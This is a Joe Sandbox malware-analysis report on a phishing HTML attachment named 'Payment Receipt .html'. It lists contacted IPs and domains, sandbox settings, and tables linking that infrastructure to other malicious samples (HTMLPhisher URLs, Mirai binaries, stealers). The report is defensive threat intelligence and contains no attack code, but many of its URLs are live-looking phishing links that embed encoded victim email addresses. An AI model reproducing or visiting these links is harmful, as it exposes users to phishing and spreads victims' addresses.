https://www.w3schools.com/w3css/4/w3.css	false	high
https://threemanshop.com/jssp.js	false	unknown
https://ih1.redbubble.net/image.3812524360.1168/raf,360x360,075,t,fafafa:ca443f4786.jpg	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.redbubble.com/people/developerfrida	chromecache_63.2.dr, chromecache_72.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
108.156.152.88	d2vgu95hoyrpkh.cloudfront.net	United States	16509	AMAZON-02US	false
13.107.246.41	part-0013.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
152.199.4.44	cs1100.wpc.omegacdn.net	United States	15133	EDGECASTUS	false
64.233.177.106	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
192.229.173.207	cs837.wac.edgecastcdn.net	United States	15133	EDGECASTUS	false
72.21.91.237	cs203.wac.edgecastcdn.net	United States	15133	EDGECASTUS	false
13.107.213.41	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.67.202.97	threemanshop.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428433
Start date and time:	2024-04-18 23:26:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment Receipt .html
Detection:	MAL
Classification:	mal72.phis.winHTML@24/30@16/11
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 74.125.136.94, 173.194.219.102, 173.194.219.139, 173.194.219.100, 173.194.219.113, 173.194.219.138, 173.194.219.101, 64.233.185.84, 34.104.35.123, 23.203.48.154, 23.203.48.160, 142.250.9.94, 74.125.138.94, 184.26.137.10, 184.26.137.24, 172.217.215.95, 64.233.177.95, 108.177.122.95, 74.125.138.95, 142.250.105.95, 64.233.185.95, 173.194.219.95, 142.251.15.95, 172.253.124.95, 74.125.136.95, 142.250.9.95, 64.233.176.95, 72.21.81.240, 192.229.211.108, 142.250.105.94, 64.233.185.139, 64.233.185.113, 64.233.185.100, 64.233.185.102, 64.233.185.101, 64.233.185.138
Excluded domains from analysis (whitelisted): san-ion.secure4.scene7.com.edgekey.net, logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, cdn-dynmedia-1.microsoft.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, e81481.dsca.akamaiedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com, optimizationguide-pa.googleapis.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: Payment Receipt .html

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
108.156.152.88	Revised Employee Handbook Mpft English 5jSvP6uC7PF7g2E6WU6h2nsiROQCKe.htm	Get hash	malicious	Unknown	Browse
	Employee Handbook Manual Revised Today - ref#4qe7wFVxJj.htm	Get hash	malicious	Unknown	Browse
	Endocustomerservice.global_Fax.html	Get hash	malicious	Unknown	Browse
	voice_ recording872987647384.htm	Get hash	malicious	HTMLPhisher	Browse
	https://betweenthelakeslawncare.com/jo/zi/Yessica@BackflowPreventer.com	Get hash	malicious	Unknown	Browse
	https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//ammuchee.com/info/tech/qwertyshshdjdjdjdncnchdjdeieujdjdndncmvnvnbdsjksjhdheyjdndncmcncnc/sjsksjdjdhdncnchdheyeudjdkdkdmcmcckdjgsgshdbdndjcndnjdjdjssbcnchdhsj/ilqlhsjblifgnsbvfzktoqmecnhlsygugqcuuisqkcdfbuejzvhnfndkiqoxmujypeooogotvvcaotxduopphebsnahcpgqmnjfk/#.zfsnx.bWFsZ29yemF0YS56dXJla0BEZWVaZWUucGw=	Get hash	malicious	HTMLPhisher	Browse
13.107.246.41	http://www.surveymonkey.com/tr/v1/te/PUEIZHbYTJGrZEIkVMWlCoicdktJQxDgUh5D5mhe1V5RrTmuIdynx7PnFHXRUx9slMgQjvZdyUWqhr_2Bl49oNXjy3TOleTjKMKR6WbsGcrstlT2syBMlSkW7U5aKlKcBD9NFqJqrxGyODSWJJr6_2BMbXsKkDA_2F0ep4iw23xw6huuM_3D	Get hash	malicious	Unknown	Browse	www.eand.com/en/index.html
	02-11-2024 MVP.html	Get hash	malicious	Unknown	Browse	www.mvphealthcare.com/
	02-11-2024 MVP.html	Get hash	malicious	Unknown	Browse	www.mvphealthcare.com/
	http://y84x.mjt.lu/lnk/CAAABPdweCoAAAAAAAAAAAVG8MwAAAA6pnMAAAAAAAvpOQBlhIO4-ImJ1UImRBC5CNVIkLSaswAL-7Q/2/r-vXj7XjX0azsD7QNKNH-A/aHR0cHM6Ly9hcHBjZW50ZXIubXMvaW52aXRhdGlvbnMvb3JnL2IxNjM2ZDYzMTE0YTM0MjBkYWFmNTg4YTE5N2Y0N2MxNGY4ZDViNWMyM2ZjM2RhYTgxMWM0ODgwOWM1ZTZkNjQ	Get hash	malicious	Unknown	Browse	appcenter.ms/
	http://url7816.acetaxi.com/ls/click?upn=k9eqZnPBEZmPVPka3LxS61O1ksdCJOgznvtiwccqzi2-2BneqvfCXEJ-2FQj-2BZo7snmCwDunBahf2LYhfs7qQp7-2F23xLStq-2BkxJ70xqVvyXzkWM-3D8Cie_z5TGfmB4A65PPE2hDgRdrx6OZsZ3AmrJLHJ0M9ePWeHP5QDTWsAVp117uXam9dNn-2BGSxHeP-2BInRF-2Bgy2v-2FXBPODjmLss6NRV2RYsUYD7um77hgLl0ET9pPGTHF-2BQ1m6-2Fw7-2B-2B9DJOpakZj874YLC8uUep0F7rZMDlM46gmHmQqqAeCV477M0h2b07T2IcXu0hzUcKftN0UG2jhPq8qo00cQl0gvOLl-2BjChyaOdLpENao-3D	Get hash	malicious	Unknown	Browse	twiliosolutions.azurefd.net/
239.255.255.250	Proposal Invitation_ Proposal is Due by the EOB May 15.eml	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	tA6etkt3gb.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse
	http://wzxqi.theknittingdoula.com/ghoopuh/lopwiuiye	Get hash	malicious	HTMLPhisher	Browse
	https://nwcchicago-my.sharepoint.com/:b:/p/jpsanavaitis/EZA36vHeUQxCnJ96O418g94BWiWpCx4SyNTLHION5X1T7g?e=N00DO7	Get hash	malicious	HTMLPhisher	Browse
	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=	Get hash	malicious	HTMLPhisher	Browse
	https://dinamicconsultores.app.questorpublico.com.br/	Get hash	malicious	HTMLPhisher	Browse
	https://notascam.lol/ATB/index.php	Get hash	malicious	Unknown	Browse
	https://msteams.link/WK80	Get hash	malicious	Phisher	Browse
	https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse
	Cheater Pro 1.6.0.msi	Get hash	malicious	Unknown	Browse
192.229.173.207	https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499fa	Get hash	malicious	HTMLPhisher	Browse
	2024-04-16_11h42_39.png	Get hash	malicious	Unknown	Browse
	Attachment dl.gf.it_erp_p2p_jaggaer@globalfoundries.com-----ADOBE-FILE.HTML	Get hash	malicious	Unknown	Browse
	ATT28392.htm_	Get hash	malicious	HTMLPhisher	Browse
	https://quiz.tryinteract.com/#/6616d475ab2cc50015573c84	Get hash	malicious	Unknown	Browse
	https://coperationcompany.xyz/n/U1Y9bzM2NV82X25vbQ==/VUlEPVVTRVIwMTA0MjAyNFVOSVFVRTEwMjcwNDAxNTMyMDI0MjAyNDA0MDEyNzEwNTM=/	Get hash	malicious	HTMLPhisher	Browse
	https://www.surveymonkey.com/tr/v1/te/akU_2BQc2vAhAsa_2B264x1g6_2FpF_2Fhy3EhxbpxJDHYpYZT3PErDK_2Bf6OjNYOPsqZdKwg1FzF0BnjDAGLKtSwWsTWescd252jHDUssF95noWETx50NAtsDT_2FwPDzD_2FTuRJvRXtr_2F38HPTPPrNs091S8Nbhkk_2Fl0xRzf94S_2FukU_2BJCn4A8F2xUD6W_2F494D_2Bk_2BUIHNcF0kF9MJXPACd0TOf_2FryEjSvcwt5388_2B9PAUnTAORsIBA6XANs79PokM5yikCF5e7	Get hash	malicious	HTMLPhisher	Browse
	https://cloudflare-ipfs.com/ipfs/bafkreiei4pxrcjpggzud4xyyiyiabwytakelojvp5lwpyll5mt4yy7l4lq	Get hash	malicious	Unknown	Browse
	https://cloudflare-ipfs.com/ipfs/bafkreic3i3fs3k4jlf22yl27nsvzygbmg4qrugkfu2cq65waif525cpbx4#	Get hash	malicious	HTMLPhisher	Browse
	https://nhlnkc.com/api/v1/track/link/click/63bba6a47a3f62bf2d36bda8/emails.649b108787b7027f9ddac21f?link=http://930634sxy2v0.fastfiles.co/ad/Z2lsbGVzLmdhcmNpYUBiY3AtYmFuay5jb20=	Get hash	malicious	HTMLPhisher	Browse
152.199.4.44	https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse
	http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQ	Get hash	malicious	HTMLPhisher	Browse
	https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499fa	Get hash	malicious	HTMLPhisher	Browse
	https://csactivation.carestreamdental.com/ViewSwitcher/SwitchView?mobile=True&returnUrl=https://bpy.us/moTxvQ3E4RAm3ToTxn2APa4RAchQ3E4RAD5QyD5Qm3TQ3EmD5Qz01coTxm&mc=101631	Get hash	malicious	Unknown	Browse
	http://t.co/IcNMLUH6OE	Get hash	malicious	HTMLPhisher	Browse
	http://t.cm.morganstanley.com/r/?id=h1b92d14%2C134cc33c%2C1356be32&p1=www.saiengroup.com%2Fteaz%2F648c482b60b3906833c9304bab170add%2FJBVNhz%2FYW15LmNoZW5AZG91YmxlbGluZS5jb20=	Get hash	malicious	HTMLPhisher	Browse
	https://17apmic5.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse
	https://tukix.net/qp9sKz1A43Pt/news/d1022596bf248601809305df44e8f1f4////dGNvb3BlckBod25lbmVyZ3kuY29t	Get hash	malicious	HTMLPhisher	Browse
	Periscope Product List RFQ, NDA & Purchase Terms 2024.shtml	Get hash	malicious	HTMLPhisher	Browse
	APRIL PAYMENT_17-04-24.HTML	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cs837.wac.edgecastcdn.net	https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499fa	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	2024-04-16_11h42_39.png	Get hash	malicious	Unknown	Browse	192.229.173.207
	Attachment dl.gf.it_erp_p2p_jaggaer@globalfoundries.com-----ADOBE-FILE.HTML	Get hash	malicious	Unknown	Browse	192.229.173.207
	ATT28392.htm_	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://quiz.tryinteract.com/#/6616d475ab2cc50015573c84	Get hash	malicious	Unknown	Browse	192.229.173.207
	https://coperationcompany.xyz/n/U1Y9bzM2NV82X25vbQ==/VUlEPVVTRVIwMTA0MjAyNFVOSVFVRTEwMjcwNDAxNTMyMDI0MjAyNDA0MDEyNzEwNTM=/	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://www.surveymonkey.com/tr/v1/te/akU_2BQc2vAhAsa_2B264x1g6_2FpF_2Fhy3EhxbpxJDHYpYZT3PErDK_2Bf6OjNYOPsqZdKwg1FzF0BnjDAGLKtSwWsTWescd252jHDUssF95noWETx50NAtsDT_2FwPDzD_2FTuRJvRXtr_2F38HPTPPrNs091S8Nbhkk_2Fl0xRzf94S_2FukU_2BJCn4A8F2xUD6W_2F494D_2Bk_2BUIHNcF0kF9MJXPACd0TOf_2FryEjSvcwt5388_2B9PAUnTAORsIBA6XANs79PokM5yikCF5e7	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://cloudflare-ipfs.com/ipfs/bafkreiei4pxrcjpggzud4xyyiyiabwytakelojvp5lwpyll5mt4yy7l4lq	Get hash	malicious	Unknown	Browse	192.229.173.207
	https://cloudflare-ipfs.com/ipfs/bafkreic3i3fs3k4jlf22yl27nsvzygbmg4qrugkfu2cq65waif525cpbx4#	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://nhlnkc.com/api/v1/track/link/click/63bba6a47a3f62bf2d36bda8/emails.649b108787b7027f9ddac21f?link=http://930634sxy2v0.fastfiles.co/ad/Z2lsbGVzLmdhcmNpYUBiY3AtYmFuay5jb20=	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
cs1100.wpc.omegacdn.net	https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQ	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499fa	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	rapport.docx_POH.docx	Get hash	malicious	Unknown	Browse	152.199.4.44
	https://csactivation.carestreamdental.com/ViewSwitcher/SwitchView?mobile=True&returnUrl=https://bpy.us/moTxvQ3E4RAm3ToTxn2APa4RAchQ3E4RAD5QyD5Qm3TQ3EmD5Qz01coTxm&mc=101631	Get hash	malicious	Unknown	Browse	152.199.4.44
	http://t.co/IcNMLUH6OE	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	http://t.cm.morganstanley.com/r/?id=h1b92d14%2C134cc33c%2C1356be32&p1=www.saiengroup.com%2Fteaz%2F648c482b60b3906833c9304bab170add%2FJBVNhz%2FYW15LmNoZW5AZG91YmxlbGluZS5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://17apmic5.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	152.199.4.44
	https://tukix.net/qp9sKz1A43Pt/news/d1022596bf248601809305df44e8f1f4////dGNvb3BlckBod25lbmVyZ3kuY29t	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	Periscope Product List RFQ, NDA & Purchase Terms 2024.shtml	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
cs203.wac.edgecastcdn.net	http://cgsketchbook.com	Get hash	malicious	Unknown	Browse	68.232.35.237
	https://cgsketchbook.com/	Get hash	malicious	Unknown	Browse	68.232.35.237
	https://cgsketchbook.com/	Get hash	malicious	Unknown	Browse	68.232.35.237
	http://halffreesk.live	Get hash	malicious	Unknown	Browse	68.232.35.237
part-0013.t-0009.t-msedge.net	http://wzxqi.theknittingdoula.com/ghoopuh/lopwiuiye	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	https://nwcchicago-my.sharepoint.com/:b:/p/jpsanavaitis/EZA36vHeUQxCnJ96O418g94BWiWpCx4SyNTLHION5X1T7g?e=N00DO7	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://dinamicconsultores.app.questorpublico.com.br/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	PO_983888123.xls	Get hash	malicious	Unknown	Browse	13.107.213.41
	https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	https://znixulyp.com/vGgw6o	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	https://huntingtonoakmont-my.sharepoint.com/:b:/g/personal/cmariotti_oakmontcommunities_com/EeUv57weU1BKhs36H3rF_G0BHM4kTzJShI_ZPwFvp1P7-g?e=4UASJ5	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQ	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	https://t.airgears.org/r/?resource=120958450/4d9ac80/2a1170&e=dYRtX3NhcXBhbXduQUFjYW4kb26DYXK0LWQzJnV0bW9zb3WyY3V9YWNkJnV1bV9uAWRpdZ09ZW1ibWwmd39udW09OUT3MTNwMzQzMUYmd391cj0zJm1pX4U9eW5kZWApbmVlJmNpZD2yYURNNzV0NDgmYnlkPUE2MjBzN&ref_=1wy&ref=98k/&u=4jj4/&eid=xekc6v/DU5MjEnc2VoY29lZT11cmRlZnluZWQ&s=obI3r-q7de3Me3nnN3cpKfiix7CULJmXF7FuunFtjSx	Get hash	malicious	Unknown	Browse	13.107.246.41
	https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499fa	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
d2vgu95hoyrpkh.cloudfront.net	https://7r62.j7s61.com/GA08G4/#bWljaGFlbC5rZW5uZXR0QGdsb2JhbGZvdW5kcmllcy5jb20=	Get hash	malicious	HTMLPhisher	Browse	108.156.152.4
	https://utk.5z193.com/UTK/#test@test.com	Get hash	malicious	HTMLPhisher	Browse	3.162.103.56
	https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org	Get hash	malicious	HTMLPhisher	Browse	108.156.152.4
	https://rts.ccmp.eu/rts/go2.aspx?h=1247107&tp=i-1NGB-Fb-EeO-1jnRvw-1c-PwWY-1c-1j0tsE-l8HoOHKMRi-iIE2M&x=readymoves.com.au/media/Imfs/%23Y2hlcnlsQGltZnMuY29tLmF1	Get hash	malicious	Unknown	Browse	3.162.103.20
	https://samartrace.co.ke/resu/repnu03/pDm2uA4djQME/transportforum@stanstedairport.com	Get hash	malicious	HTMLPhisher	Browse	108.156.152.4
	2024-04-16_11h42_39.png	Get hash	malicious	Unknown	Browse	3.162.103.56
	http://www5.dmpcalibermail.com/caliberamp/main/index.php?action=t&tag=https%3A%2F%2Fwww.newrezcorrespondent.com%2F%3Futm_source%3Damp%26amp%3Butm_medium%3Demail%26amp%3Butm_campaign%3Dheader_logo%26amp%3Butm_content%3D%5Bemail%3Acampaign_name%5D&id=2970982&contact_uuid=607faabe-0fa9-4b6c-aa85-af116b0a0d16&dest=https://hajradyeing.com%2F%5F%63%63%63%2Fq5LqZBTIawkLdAIGigpV3n1o5fE7vg/bHVjYS50YXNzb3R0aUBiZWFudGVjaC5pdA==	Get hash	malicious	HTMLPhisher	Browse	52.84.125.99
	http://theprudhommeteam.88stink.com/	Get hash	malicious	HTMLPhisher	Browse	13.226.210.95
	https://lookerstudio.google.com/s/ow_9c3UHIyo	Get hash	malicious	HTMLPhisher	Browse	13.225.214.38
	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=revistaegle.com/revistaegle/revistaegle/pMBFN17716pMBFN17716pMBFN/TG91aXMuRnJhbnplc2VAQU1DTkVUV09SS1MuQ09N	Get hash	malicious	HTMLPhisher	Browse	13.225.214.27

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	czEunnbk7b.elf	Get hash	malicious	Mirai	Browse	54.119.141.90
	BzmhHwFpCV.elf	Get hash	malicious	Mirai	Browse	52.39.162.69
	6VXQ3TUNZo.elf	Get hash	malicious	Mirai	Browse	3.100.156.63
	BLrwZkQmAq.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	dPFRrhKTeG.elf	Get hash	malicious	Unknown	Browse	18.183.58.67
	Gq7FlDf6cE.elf	Get hash	malicious	Mirai	Browse	52.211.87.19
	MR6rclGNGX.elf	Get hash	malicious	Gafgyt	Browse	34.254.182.186
	KSRRrEMt1w.elf	Get hash	malicious	Mirai	Browse	54.245.17.95
	nsmcSHJVkI.elf	Get hash	malicious	Gafgyt	Browse	34.243.160.129
	OTBVplDFut.elf	Get hash	malicious	Unknown	Browse	34.254.182.186
EDGECASTUS	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
	https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQ	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://recouvrement-assurance.fr/LKeZL	Get hash	malicious	Unknown	Browse	152.199.24.185
	https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499fa	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FC2educate/aEFQv26188aEFQv26188aEFQv/anVsaWUubG9uZ2lub0BjMmVkdWNhdGUuY29t	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
	https://csactivation.carestreamdental.com/ViewSwitcher/SwitchView?mobile=True&returnUrl=https://bpy.us/moTxvQ3E4RAm3ToTxn2APa4RAchQ3E4RAD5QyD5Qm3TQ3EmD5Qz01coTxm&mc=101631	Get hash	malicious	Unknown	Browse	152.199.4.44
	http://t.co/IcNMLUH6OE	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	http://t.cm.morganstanley.com/r/?id=h1b92d14%2C134cc33c%2C1356be32&p1=www.saiengroup.com%2Fteaz%2F648c482b60b3906833c9304bab170add%2FJBVNhz%2FYW15LmNoZW5AZG91YmxlbGluZS5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://17apmic5.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	152.199.4.44
MICROSOFT-CORP-MSN-AS-BLOCKUS	tA6etkt3gb.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	20.42.73.29
	http://wzxqi.theknittingdoula.com/ghoopuh/lopwiuiye	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	czEunnbk7b.elf	Get hash	malicious	Mirai	Browse	22.196.29.214
	9IseFevRH6.elf	Get hash	malicious	Mirai	Browse	21.68.157.6
	BzmhHwFpCV.elf	Get hash	malicious	Mirai	Browse	22.204.37.82
	6VXQ3TUNZo.elf	Get hash	malicious	Mirai	Browse	22.241.37.71
	dPFRrhKTeG.elf	Get hash	malicious	Unknown	Browse	52.99.12.214
	Gq7FlDf6cE.elf	Get hash	malicious	Mirai	Browse	21.5.181.161
	KSRRrEMt1w.elf	Get hash	malicious	Mirai	Browse	21.150.186.48
	SecuriteInfo.com.Trojan.Siggen17.35688.9477.7627.exe	Get hash	malicious	Poisonivy	Browse	168.61.215.74
EDGECASTUS	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
	https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQ	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://recouvrement-assurance.fr/LKeZL	Get hash	malicious	Unknown	Browse	152.199.24.185
	https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499fa	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FC2educate/aEFQv26188aEFQv26188aEFQv/anVsaWUubG9uZ2lub0BjMmVkdWNhdGUuY29t	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
	https://csactivation.carestreamdental.com/ViewSwitcher/SwitchView?mobile=True&returnUrl=https://bpy.us/moTxvQ3E4RAm3ToTxn2APa4RAchQ3E4RAD5QyD5Qm3TQ3EmD5Qz01coTxm&mc=101631	Get hash	malicious	Unknown	Browse	152.199.4.44
	http://t.co/IcNMLUH6OE	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	http://t.cm.morganstanley.com/r/?id=h1b92d14%2C134cc33c%2C1356be32&p1=www.saiengroup.com%2Fteaz%2F648c482b60b3906833c9304bab170add%2FJBVNhz%2FYW15LmNoZW5AZG91YmxlbGluZS5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://17apmic5.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	152.199.4.44
EDGECASTUS	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
	https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
